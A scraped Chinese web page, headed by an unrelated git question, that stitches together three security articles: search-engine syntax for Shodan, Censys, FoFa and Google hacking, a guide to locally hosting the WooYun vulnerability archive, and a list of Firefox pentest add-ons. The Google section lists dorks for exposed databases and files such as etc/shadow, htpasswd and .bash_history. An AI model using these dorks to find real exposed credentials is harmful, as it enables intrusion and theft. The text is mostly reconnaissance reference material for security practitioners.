o为什么会出现 git删除remote origins/origin/head
点击联系发帖人
时间:2017-07-24 09:00
&p&搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing等。但我本篇要纪录的并不是这些常用的搜索引擎,而是信息安全从业人员必备的几款网络搜索引擎。本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa,Dnsdb等。介绍的内容主要是这几款搜索引擎的一些高级语法,掌握高级语法会让搜索结果更准确。&/p&&br&&p&对搜索引擎语法有所遗忘的,本文可当参考,仅此而已&/p&&br&&p&&strong&Google搜索引擎&/strong&&/p&&br&&p&这里之所以要介绍google搜索引擎,是因为它有别于百度、搜狗等内容搜索引擎,其在安全界有着非同一般的地位,甚至专门有一名词为google hacking用来形容google与安全非同寻常的关系。&/p&&br&&h4&&strong&google基本语法&/strong&&/h4&&br&&p&Index of/ 使用它可以直接进入网站首页下的所有文件和文件夹中。&br&intext: 将返回所有在网页正文部分包含关键词的网页。&br&intitle: 将返回所有网页标题中包含关键词的网页。&br&cache: 搜索google里关于某些内容的缓存。&br&define: 搜索某个词语的定义。&br&filetype: 搜索指定的文件类型,如:.bak,.mdb,.inc等。&br&info: 查找指定站点的一些基本信息。&br&inurl: 搜索我们指定的字符是否存在于URL中。&br&Link: link:thief.one可以返回所有和thief.one做了链接的URL。&br&site: site:thief.one将返回所有和这个站有关的URL。&/p&&p&+ 把google可能忽略的字列如查询范围。&br&- 把某个字忽略,例子:新加 -坡。&br&~ 同意词。&br&. 单一的通配符。&br&* 通配符,可代表多个字母。&br&“” 精确查询。&/p&&br&&p&&strong&搜索不同国家网站&/strong&&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&inurl:tw 台湾inurl:jp 日本
&/code&&/pre&&/div&&h4&&strong&利用google暴库&/strong&&/h4&&br&&p&利用goole可以搜索到互联网上可以直接下载到的数据库文件,语法如下:&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&inurl:editor/db/inurl:eWebEditor/db/inurl:bbs/data/inurl:databackup/inurl:blog/data/inurl:\boke\datainurl:bbs/database/inurl:conn.aspinc/conn.aspServer.mapPath(“.mdb”)allinurl:bbs datafiletype:mdb inurl:databasefiletype:inc conninurl:data filetype:mdbintitle:&index of& data
&/code&&/pre&&/div&&h4&&strong&利用goole搜索敏感信息&/strong&&/h4&&br&&p&利用google可以搜索一些网站的敏感信息,语法如下:&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&intitle:&index of& etcintitle:&Index of& .sh_historyintitle:&Index of& .bash_historyintitle:&index of& passwdintitle:&index of& people.lstintitle:&index of& pwd.dbintitle:&index of& etc/shadowintitle:&index of& spwdintitle:&index of& master.passwdintitle:&index of& htpasswdinurl:service.pwd
&/code&&/pre&&/div&&h4&利用google搜索C段服务器信息&/h4&&br&&p&此技巧来自lostwolf&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&site:218.87.21.*
&/code&&/pre&&/div&&p&可通过google可获取218.87.21.0/24网络的服务信息。&/p&&br&&h3&shodan搜索引擎&/h3&&br&&p&shodan网络搜索引擎偏向网络设备以及服务器的搜索,具体内容可上网查阅,这里给出它的高级搜索语法。&/p&&p&&br&地址:&a href=&/?target=https%3A//www.shodan.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Shodan&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&hostname: 搜索指定的主机或域名,例如 hostname:”google”&/p&&/li&&li&&p&port: 搜索指定的端口或服务,例如 port:”21”&/p&&/li&&li&&p&country: 搜索指定的国家,例如 country:”CN”&/p&&/li&&li&&p&city: 搜索指定的城市,例如 city:”Hefei”&/p&&/li&&li&&p&org: 搜索指定的组织或公司,例如 org:”google”&/p&&/li&&li&&p&isp: 搜索指定的ISP供应商,例如 isp:”China Telecom”&/p&&/li&&li&&p&product: 搜索指定的操作系统/软件/平台,例如 product:”Apache httpd”&/p&&/li&&li&&p&version: 搜索指定的软件版本,例如 version:”1.6.2”&/p&&/li&&li&&p&geo: 搜索指定的地理位置,例如 geo:”31.08”&/p&&/li&&li&&p&before/after: 搜索指定收录时间前后的数据,格式为dd-mm-yy,例如 before:”11-11-15”&/p&&/li&&li&&p&net: 搜索指定的IP地址或子网,例如 net:”210.45.240.0/24”&/p&&/li&&/ul&&p&以上内容参考:&a href=&/?target=http%3A//xiaix.me/shodan-xin-shou-ru-keng-zhi-nan/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&xiaix's Blog&i class=&icon-external&&&/i&&/a&&/p&&br&&h3&&strong&censys搜索引擎&/strong&&/h3&&br&&p&censys搜索引擎功能与shodan类似,以下几个文档信息。&/p&&p&&br&地址:&a href=&/?target=https%3A//www.censys.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Censys&i class=&icon-external&&&/i&&/a&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&https://www.censys.io/certificates/help 帮助文档https://www.censys.io/ipv4?q=
ip查询https://www.censys.io/domain?q=
域名查询https://www.censys.io/certificates?q= 证书查询
&/code&&/pre&&/div&&h4&&strong&搜索语法&/strong&&/h4&&br&&p&默认情况下censys支持全文检索。&/p&&br&&ul&&li&&p&23.0.0.0/8 or 8.8.8.0/24 可以使用and or not&/p&&/li&&li&&p&80.http.get.status_code: 200 指定状态&/p&&/li&&li&&p&80.http.get.status_code:[200 TO 300] 200-300之间的状态码&/p&&/li&&li&&p&location.country_code: DE 国家&/p&&/li&&li&&p&protocols: (“23/telnet” or “21/ftp”) 协议&/p&&/li&&li&&p&tags: scada 标签&/p&&/li&&li&&p&80.http.get.headers.server:nginx 服务器类型版本&/p&&/li&&li&&p&autonomous_system.description: University 系统描述&/p&&/li&&li&&p&正则&/p&&br&&/li&&/ul&&h3&&strong&钟馗之眼&/strong&&/h3&&br&&p&钟馗之眼搜索引擎偏向web应用层面的搜索。&/p&&p&地址:&a href=&/?target=https%3A//www.zoomeye.org/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&zoomeye.org/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&app:nginx 组件名&/p&&/li&&li&&p&ver:1.0 版本&/p&&/li&&li&&p&os:windows 操作系统&/p&&/li&&li&&p&country:”China” 国家&/p&&/li&&li&&p&city:”hangzhou” 城市&/p&&/li&&li&&p&port:80 端口&/p&&/li&&li&&p&hostname:google 主机名&/p&&/li&&li&&p&site:thief.one 网站域名&/p&&/li&&li&&p&desc:nmask 描述&/p&&/li&&li&&p&keywords:nmask’blog 关键词&/p&&/li&&li&&p&service:ftp 服务类型&/p&&/li&&li&&p&ip:8.8.8.8 ip地址&/p&&/li&&li&&p&cidr:8.8.8.8/24 ip地址段&/p&&br&&/li&&/ul&&h3&&strong&FoFa搜索引擎&/strong&&/h3&&br&&p&FoFa搜索引擎偏向资产搜索。&/p&&p&地址:&a href=&/?target=https%3A//fofa.so& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FOFA Pro - 网络空间安全搜索引擎,网络空间搜索引擎,网络空间测绘,安全态势感知&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&title=”abc” 从标题中搜索abc。例:标题中有北京的网站。&/p&&/li&&li&&p&header=”abc” 从http头中搜索abc。例:jboss服务器。&/p&&/li&&li&&p&body=”abc” 从html正文中搜索abc。例:正文包含Hacked by。&/p&&/li&&li&&p&domain=”qq.com” 搜索根域名带有&a href=&/?target=http%3A//qq.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的网站。例: 根域名是&a href=&/?target=http%3A//qq.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的网站。&/p&&/li&&li&&p&host=”.” 从url中搜索.,注意搜索要用host作为名称。&/p&&/li&&li&&p&port=”443” 查找对应443端口的资产。例: 查找对应443端口的资产。&/p&&/li&&li&&p&ip=”1.1.1.1” 从ip中搜索包含1.1.1.1的网站,注意搜索要用ip作为名称。&/p&&/li&&li&&p&protocol=”https” 搜索制定协议类型(在开启端口扫描的情况下有效)。例: 查询https协议资产。&/p&&/li&&li&&p&city=”Beijing” 搜索指定城市的资产。例: 搜索指定城市的资产。&/p&&/li&&li&&p®ion=”Zhejiang” 搜索指定行政区的资产。例: 搜索指定行政区的资产。&/p&&/li&&li&&p&country=”CN” 搜索指定国家(编码)的资产。例: 搜索指定国家(编码)的资产。&/p&&/li&&li&&p&cert=”” 搜索证书(https或者imaps等)中带有&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的资产。&/p&&br&&/li&&/ul&&p&&strong&高级搜索:&/strong&&/p&&br&&ul&&li&&p&title=”powered by” && title!=discuz&/p&&/li&&li&&p&title!=”powered by” && body=discuz&/p&&/li&&li&&p&( body=”content=\”WordPress” || (header=”X-Pingback” && header=”/xmlrpc.php” && body=”/wp-includes/“) ) && host=””&/p&&br&&/li&&/ul&&h3&&strong&Dnsdb搜索引擎&/strong&&/h3&&br&&p&dnsdb搜索引擎是一款针对dbs解析的查询平台。&/p&&p&地址:&a href=&/?target=https%3A//www.dnsdb.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DnsDB&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&p&DnsDB查询语法结构为条件1 条件2 条件3 …., 每个条件以空格间隔, DnsDB 会&/p&&p&把满足所有查询条件的结果返回给用户.&/p&&br&&strong&域名查询条件&/strong&&br&&p&域名查询是指查询顶级私有域名所有的DNS记录, 查询语法为domain:.&/p&&p&例如查询&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 的所有DNS记录: .&/p&&p&域名查询可以省略domain:.&/p&&br&&strong&主机查询条件&/strong&&br&&p&查询语法:host:&/p&&p&&br&例如查询主机地址为的DNS记录: host:&/p&&p&主机查询条件与域名查询查询条件的区别在于, 主机查询匹配的是DNS记录的&/p&&p&Host值&br&&/p&&br&&strong&按DNS记录类型查询&/strong&&br&&p&查询语法: type:.&br&例如只查询A记录: type:a&br&使用条件:必须存在domain:或者host:条件,才可以使用type:查询语法&/p&&br&&strong&按IP限制&/strong&&br&&p&查询语法: ip:&br&查询指定IP: ip:8.8.8.8, 该查询与直接输入8.8.8.8进行查询等效&br&查询指定IP范围: ip:8.8.8.8-8.8.255.255&br&CIDR: ip:8.8.0.0/24&br&IP最大范围限制65536个&/p&&br&&strong&条件组合查询的例子&/strong&&br&&p&查询&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的所有A记录: &a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& type:a&/p&&p&本文将会持续补充一些内容……&/p&&br&&p&From:&a href=&/?target=http%3A//thief.one//1/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&【渗透神器系列】搜索引擎&i class=&icon-external&&&/i&&/a&&/p&
搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing等。但我本篇要纪录的并不是这些常用的搜索引擎,而是信息安全从业人员必备的几款网络搜索引擎。本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa…
&p&前段时间,老师在群里分享了一个 github 的连接,说开源了。&/p&&p&我记得当时,看了看,才那么 几 百 M ,,,还 8.8 W
= = !&/p&&p&昨天,我一朋友自己直接搭自己硬盘上了,我就自己搭搭吧,很简单的,一放一点就成了。&/p&&p&&b&# &/b&按我的风格,肯定要记录的详细的不能再详细了 ,就算很简单的步骤,我也要详细点。&/p&&p&&b&#&/b& 就像,我上次用 linux 的系统,搭建一个网站,要是有大牛直接甩我 一堆命令行 ,该有多好,我直接张贴复制就是怼。 #(斜眼笑。。。)&/p&&p&&b&# 晚,我百度网盘里存的图片,真的存在一句话!0.0屌啊!我再开一个帖子,写写把。。。&/b&&/p&&p&&b&这个是关于两个图片马的帖子。 &br&&/b&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&/p/
&/code&&/pre&&/div&&p&这个是开源地址: &br&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&/m0l1ce/wooyunallbugs
&/code&&/pre&&/div&&p&这是我存我百度盘里的:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&链接: /s/1nvkFKox 密码: 94sp
&/code&&/pre&&/div&&p&----------------------------------------------------------------------------------------------------------------&/p&&p&1,首先去下载一个集成环境工具,这里我用的 phpStudy , 33M 的这个。&/p&&p&&img src=&/v2-8a82ab7b027f1f259fb05_b.jpg& data-rawwidth=&679& data-rawheight=&135& class=&origin_image zh-lightbox-thumb& width=&679& data-original=&/v2-8a82ab7b027f1f259fb05_r.jpg&&下载地址:&a href=&/?target=http%3A//www.phpstudy.net/a.php/211.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&phpStudy
再次更新,支持自定义php版本&i class=&icon-external&&&/i&&/a&&br&&/p&&p&2,然后,我解压到我的 D 盘上了。&/p&&p&&img src=&/v2-3ca4b3d1be_b.jpg& data-rawwidth=&798& data-rawheight=&623& class=&origin_image zh-lightbox-thumb& width=&798& data-original=&/v2-3ca4b3d1be_r.jpg&&3,把源码和数据库先下载开,图片用的是外连,人家也说了,放图片的服务器不会关掉的。&/p&&p&&img src=&/v2-ce1dd65ced704cc9d3ed4b_b.jpg& data-rawwidth=&1098& data-rawheight=&286& class=&origin_image zh-lightbox-thumb& width=&1098& data-original=&/v2-ce1dd65ced704cc9d3ed4b_r.jpg&&4,把 bugs.rar 这个源码包解压到了 D:\phpStudy\WWW\bugs\
这里。&/p&&p&&img src=&/v2-efc19b467c4f179bf8e9da8c3f90a8ca_b.jpg& data-rawwidth=&796& data-rawheight=&265& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-efc19b467c4f179bf8e9da8c3f90a8ca_r.jpg&&5,在源码里找见 conn.php 这个文件,用记事本打开,或者想我一样下载了 notepad++ ,打开就是了,在里面修改成自己 MySQL 数据库的账号密码 。&/p&&p&&img src=&/v2-b9c9ffad07ad8a_b.jpg& data-rawwidth=&772& data-rawheight=&208& class=&origin_image zh-lightbox-thumb& width=&772& data-original=&/v2-b9c9ffad07ad8a_r.jpg&&&img src=&/v2-a7af61f7e09ee7d96b84ef93e4bb62fd_b.jpg& data-rawwidth=&777& data-rawheight=&193& class=&origin_image zh-lightbox-thumb& width=&777& data-original=&/v2-a7af61f7e09ee7d96b84ef93e4bb62fd_r.jpg&&6,然后把 wooyun.rar 拖进
D:\phpStudy\MySQL\data 这里解压下,这里是数据库存放的地方。&/p&&p&&img src=&/v2-4e3998dac5699cad4ce2_b.jpg& data-rawwidth=&796& data-rawheight=&382& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-4e3998dac5699cad4ce2_r.jpg&&7,启动 phpstudy ,然后点击面板上的选择版本,看下是不是 5.3 版本的,如果不是就选择到这个 5.3 版本 。(昨天就这个版本问题,害的我一连不上数据库。。。)&/p&&p&&img src=&/v2-7ca81c770a4c22f8ad37291edd6dc8c4_b.jpg& data-rawwidth=&838& data-rawheight=&395& class=&origin_image zh-lightbox-thumb& width=&838& data-original=&/v2-7ca81c770a4c22f8ad37291edd6dc8c4_r.jpg&&8,点击 mysql 管理器,站点域名管理,然后该杂弄杂弄。。。&/p&&p&&img src=&/v2-e1f98db6cdd64b7eb3a4b_b.jpg& data-rawwidth=&716& data-rawheight=&415& class=&origin_image zh-lightbox-thumb& width=&716& data-original=&/v2-e1f98db6cdd64b7eb3a4b_r.jpg&&&img src=&/v2-60ad89bec30f27e3de8fba_b.jpg& data-rawwidth=&948& data-rawheight=&546& class=&origin_image zh-lightbox-thumb& width=&948& data-original=&/v2-60ad89bec30f27e3de8fba_r.jpg&&9,一般到这里就结束了,直接启动服务器,然后然后输入 &i&127.0.0.1&/i& 就能进入了主页面了。&/p&&p&&img src=&/v2-9f9c1a4ccb719dddc6dc2f3f_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-9f9c1a4ccb719dddc6dc2f3f_r.jpg&&10,恩,先修改一个小错误,再继续说说其他的。他的源码不知道杂回事,进入具体的页面时就会在上面出现报错的提示。。。&/p&&p&&img src=&/v2-cc648b8daf693d61c28d5d_b.jpg& data-rawwidth=&1366& data-rawheight=&342& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-cc648b8daf693d61c28d5d_r.jpg&&10.1,看着挺不好看的,那我就关闭这个提醒吧,&br&&/p&&p&&img src=&/v2-8dfdc1dcdd68cb9dddc2c9a0_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-8dfdc1dcdd68cb9dddc2c9a0_r.jpg&&&img src=&/v2-897e9a9f0dc_b.jpg& data-rawwidth=&1364& data-rawheight=&329& class=&origin_image zh-lightbox-thumb& width=&1364& data-original=&/v2-897e9a9f0dc_r.jpg&&&b&# 额,那个其中有些步骤,需要多点击重启这个按钮的,就是把操作更新到设置中。。。反正最后多重启几下就好了。&/b&&br&&/p&&p&------------------------------------------------------------------------------------------------------------------------&/p&&p& 1,其他,如果修改域名的话,建议用管理员权限打开 phpstudy 这个工具 。&/p&&p&&img src=&/v2-7e87ef4dadf_b.jpg& data-rawwidth=&797& data-rawheight=&621& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-7e87ef4dadf_r.jpg&&2,继续来到域名管理的那个页面。&/p&&p&&img src=&/v2-bf8f346e68e6badedf42fa_b.jpg& data-rawwidth=&1137& data-rawheight=&548& class=&origin_image zh-lightbox-thumb& width=&1137& data-original=&/v2-bf8f346e68e6badedf42fa_r.jpg&&3,然后打开 hosts 这个文本。&/p&&p&&img src=&/v2-b54abe0f3f3_b.jpg& data-rawwidth=&1340& data-rawheight=&679& class=&origin_image zh-lightbox-thumb& width=&1340& data-original=&/v2-b54abe0f3f3_r.jpg&&4,添加自己的域名解析地址。&/p&&p&&img src=&/v2-2aef02b324bdf263f88d565f39eaaf7e_b.jpg& data-rawwidth=&796& data-rawheight=&570& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-2aef02b324bdf263f88d565f39eaaf7e_r.jpg&&5,来看一下效果 。&/p&&p&&img src=&/v2-db24c00cd16eabe25bed8078_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-db24c00cd16eabe25bed8078_r.jpg&&-----------------------------------------------------------------------------------------------------------------------&/p&&p&1,下载了一下午的图片,终于下载到我电脑上了。那么开始吧。&/p&&p& 2,在 wuyun 源码里新建一个 upload 文件夹。&/p&&p&&img src=&/v2-5984caf9dacd3c48d80c_b.jpg& data-rawwidth=&1018& data-rawheight=&359& class=&origin_image zh-lightbox-thumb& width=&1018& data-original=&/v2-5984caf9dacd3c48d80c_r.jpg&&3,把这一堆的图片全部解压到 upload 这个文件夹里。&/p&&p&&img src=&/v2-594a2db8cccefa82423e32e_b.jpg& data-rawwidth=&797& data-rawheight=&621& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-594a2db8cccefa82423e32e_r.jpg&&&img src=&/v2-4f127b76e77dae34bcefef3e2be7ae3f_b.jpg& data-rawwidth=&797& data-rawheight=&622& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-4f127b76e77dae34bcefef3e2be7ae3f_r.jpg&&&b&#&/b& 快一个小时了。。。。 关解压都能解压半个多小时,我也是醉醉的。。。&br&&/p&&p&4,继续用右键管理员权限运行
phpStudy.exe 。&/p&&p&5,继续 点击 MySQL 管理器,点击 站点域名管理 ,新增一个 static.loner.fm 域名,然后路径继续绑定到 wuyun 这个源码路径里,和一开始那个操作差不多,新增,保存。&/p&&p&&img src=&/v2-d0efbe3bcac51e106642eec_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-d0efbe3bcac51e106642eec_r.jpg&&6,继续点击 其他选项菜单,继续打开 hosts 这个文本 ,然后输入在原来的下一行输入以下地址,并保存&br&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&localhost
static.loner.fm
&/code&&/pre&&/div&&p&&img src=&/v2-e806dd998ddd0d2159aed75ab5255960_b.jpg& data-rawwidth=&1366& data-rawheight=&728& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-e806dd998ddd0d2159aed75ab5255960_r.jpg&&7,最后,启动下环境,输入地址,看下效果,是不是成功本地了。&/p&&p&&img src=&/v2-360c2adf507bfddcf6edbe50_b.jpg& data-rawwidth=&1366& data-rawheight=&512& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-360c2adf507bfddcf6edbe50_r.jpg&&&img src=&/v2-9fc0d39c6cbcefe403cd8d7f4bfe472b_b.jpg& data-rawwidth=&1366& data-rawheight=&342& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-9fc0d39c6cbcefe403cd8d7f4bfe472b_r.jpg&&--------------------------------------------------------------------------------------------------------------------------- &br&&/p&&p&&b&#
&/b&全文一步一步的写,我对我自己也是醉醉的。。。不过以后可以本地默默的看 8.8 w 的漏洞库的,嘎嘎。(*^__^*) 嘻嘻……&/p&
前段时间,老师在群里分享了一个 github 的连接,说开源了。我记得当时,看了看,才那么 几 百 M ,,,还 8.8 W = = !昨天,我一朋友自己直接搭自己硬盘上了,我就自己搭搭吧,很简单的,一放一点就成了。# 按我的风格,肯定要记录的详细的不能再详细了 …
&img src=&/50/v2-a1aed52d_b.jpg& data-rawwidth=&500& data-rawheight=&312& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&/50/v2-a1aed52d_r.jpg&&&h2&&b&0x00 介绍&/b&&br&&/h2&&p&&b&本文由 一叶知安作者:倾旋 原创。未经许可,严禁转载!&/b&&/p&&p&写这篇文章对原因就是&b&:有很多朋友问我平常渗透测试的时候都用哪些好用的插件?&/b&&/p&&p&我一般都用火狐浏览器,有以下几点理由:&/p&&p&1.安装插件方便&/p&&p&2.快速同步&/p&&p&3.没有过滤的功能,测试某些漏洞比较方便&/p&&p&4.扩展性很强、灵活&/p&&p&可能有的朋友使用的是谷歌浏览器,但是谷歌浏览器下载插件确实比火狐要麻烦一点。&/p&&h2&&b&0x01 我推荐这些&/b&&/h2&&p&&b&HackBar&/b&&/p&&img src=&/50/v2-cb0a87bdcd01_b.png& data-rawwidth=&670& data-rawheight=&156& class=&origin_image zh-lightbox-thumb& width=&670& data-original=&/50/v2-cb0a87bdcd01_r.png&&&p&方便测试SQL注入、XSS漏洞,还有附带常见的编码解码功能,以及发送数据。&/p&&p&&br&&b&Easy Screenshot&/b&&/p&&img src=&/50/v2-cd16c08ed8dd7b04c6c66_b.png& data-rawwidth=&703& data-rawheight=&672& class=&origin_image zh-lightbox-thumb& width=&703& data-original=&/50/v2-cd16c08ed8dd7b04c6c66_r.png&&&p&一个截图的小工具。&/p&&p&&br&&b&HTTP Resource Test&/b&&/p&&img src=&/50/v2-b089d63fdf0_b.png& data-rawwidth=&597& data-rawheight=&767& class=&origin_image zh-lightbox-thumb& width=&597& data-original=&/50/v2-b089d63fdf0_r.png&&&p&用来测试常见的HTTP请求方法(POST,GET,DELETE,PUT,HEAD,OPTIONS,.....)可以自己修改方法。&br&&/p&&p&&b&HTTP Requester&/b&&/p&&img src=&/50/v2-8c05db6fdbd3e_b.png& data-rawwidth=&1207& data-rawheight=&805& class=&origin_image zh-lightbox-thumb& width=&1207& data-original=&/50/v2-8c05db6fdbd3e_r.png&&&p&用来测试常见的HTTP请求方法(POST,GET,DELETE,PUT,HEAD,OPTIONS,.....)可以自己修改方法。并且支持HTTP认证、保存请求、文件上传。&/p&&p&&br&&b&HttpFox&/b&&/p&&img src=&/50/v2-e28e4bfaf187c_b.png& data-rawwidth=&1392& data-rawheight=&469& class=&origin_image zh-lightbox-thumb& width=&1392& data-original=&/50/v2-e28e4bfaf187c_r.png&&&p&实时抓取HTTP请求 。&/p&&p&&br&&b&Modify Headers&/b&&/p&&img src=&/50/v2-a25ba41ed546_b.png& data-rawwidth=&650& data-rawheight=&505& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/50/v2-a25ba41ed546_r.png&&&p&添加或修改请求头,一般用于伪造IP地址。&/p&&p&&br&&b&Swap Proxy&/b&&/p&&img src=&/50/v2-0e23d581f123cbb1e0a5a0fe730474ce_b.png& data-rawwidth=&527& data-rawheight=&356& class=&origin_image zh-lightbox-thumb& width=&527& data-original=&/50/v2-0e23d581f123cbb1e0a5a0fe730474ce_r.png&&&p&为每个请求设置HTTP代理,优点就是不用再去打开浏览器设置,一个单击搞定。&/p&&p&&br&&b&Tamper Data&/b&&/p&&img src=&/50/v2-5dfd3ecd045f_b.png& data-rawwidth=&1484& data-rawheight=&466& class=&origin_image zh-lightbox-thumb& width=&1484& data-original=&/50/v2-5dfd3ecd045f_r.png&&&p&用于篡改HTTP请求,规则可以自定义。&/p&&p&&b&User Agent Switcher &img src=&/50/v2-23b9f89ff1ab0f9642912_b.png& data-rawwidth=&658& data-rawheight=&620& class=&origin_image zh-lightbox-thumb& width=&658& data-original=&/50/v2-23b9f89ff1ab0f9642912_r.png&&&/b&&/p&&p&用于切换各类浏览器的User Agent。&/p&&p&&br&&b&Web Developer&/b&&/p&&img src=&/50/v2-d90b32c3597416dda0463_b.png& data-rawwidth=&777& data-rawheight=&406& class=&origin_image zh-lightbox-thumb& width=&777& data-original=&/50/v2-d90b32c3597416dda0463_r.png&&&p&可以增加、删除、更改cookie,调试静态页面、禁用JS脚本、查看网页i信息以及请求头。&/p&&h2&&b&0x02 HackBar详解&/b&&/h2&&p&不管怎么样,都要凑够字数是吧! 详情我们视频里见!&br&&/p&&p&&b&安装完毕是这样的: &/b&&/p&&p&&img src=&/50/v2-cb0a87bdcd01_b.png& data-rawwidth=&670& data-rawheight=&156& class=&origin_image zh-lightbox-thumb& width=&670& data-original=&/50/v2-cb0a87bdcd01_r.png&& 首先先介绍横向&b&第一排的下拉框&/b&:&/p&&p&&b&INT、 HEX、OCT、Alphabet、AlNum&/b& 分别代表了整数、十六进制、八进制、字母表、所有。&/p&&p&假设你的输入框中有a这个字符,然后你将下拉框调整为Alphabet,再点击右边的“&b&+&/b&”,接下来你就会发现字母a变成了字母b!&/p&&p&整数类型的话也是一样,必须调整为INT或者AlNum,它会帮助你自动增长。&/p&&p&&b&Load URL:&/b&将当前浏览器的地址栏url复制到输入框中。&/p&&p&&b&Split URL:&/b&按照&来分割提交参数,并且一个参数占一行。&/p&&p&&b&Execute:&/b&提交请求。
&/p&&p&&b&SQL:&/b&主要用于SQL注入辅助,支持MySQL、MSSQL、Oracle的字符简单转换,也能够根据输入的数字直接生成联合注入的语句、并且也可以替换空格为注释符。&/p&&p&&b&XSS:&/b&用于将字符转换成ASCII码、HTML实体符号,附带生成一个测试XSS漏洞的alert谈窗代码。&/p&&p&&b&Encryption:&/b&用于加密字符,支持MD5、SHA1、SHA-256、ROT13&/p&&p&&b&Encoding:&/b&用于编码字符, 支持URL编码、Base64编码、十六进制编码。&br&&/p&&p&&b&Other:&/b&分别是Addslashes(将特殊字符使用“\”转义)、Stripslashes(去除转义)、Strip spaces(去除空格)、Reverse(字符串反转)。&/p&&p&&b&Usefull strings:&/b&一些常量,包括(元周率、菲波那切数列、内存溢出...)&/p&&p&&b&Enable Post data:&/b&这里勾选上后,会有一个输入框,使用来提交POST数据的。&/p&&p&&b&Enable Referrer:&/b&HTTP请求中的上一个页面的来源地址 。(一般用于测试CSRF防御机制)&/p&&h2&&b&0x03 关于视频&/b&&br&&/h2&&p&由于火狐插件相关的介绍文章较多,我准备给大家录制一个小视频,来动手实践学习使用插件。&/p&&p&(1)如何安装插件&/p&&p&(2)优化浏览器界面&/p&&p&(3) 从地一个插件开始介绍...&/p&&p&(4)总结&br&&/p&&p&那么,视频出来后我会把网盘地址放到文末,希望大家多多支持!!&/p&&p&========================================================================= &br&&/p&&p&微云链接:&a href=&/?target=https%3A///8eb71534dadafc287da42& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/8eb715&/span&&span class=&invisible&&34dadafc287da42&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& (密码:WhXJCu)&/p&
0x00 介绍 本文由 一叶知安作者:倾旋 原创。未经许可,严禁转载!写这篇文章对原因就是:有很多朋友问我平常渗透测试的时候都用哪些好用的插件?我一般都用火狐浏览器,有以下几点理由:1.安装插件方便2.快速同步3.没有过滤的功能,测试某些漏洞比较方便4.…
